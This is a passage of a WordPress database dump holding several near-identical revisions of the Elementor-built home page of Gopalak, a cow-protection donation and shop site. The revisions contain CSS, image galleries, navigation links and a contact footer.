src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-20 18:07:10','2022-10-20 12:37:10','',1373,'https://gopalak.in/?p=1969',0,'revision','',0),(1970,1,'2022-10-20 18:07:47','2022-10-20 12:37:47','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-20 18:07:47','2022-10-20 12:37:47','',1373,'https://gopalak.in/?p=1970',0,'revision','',0),(1971,1,'2022-10-20 18:07:48','2022-10-20 12:37:48','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" 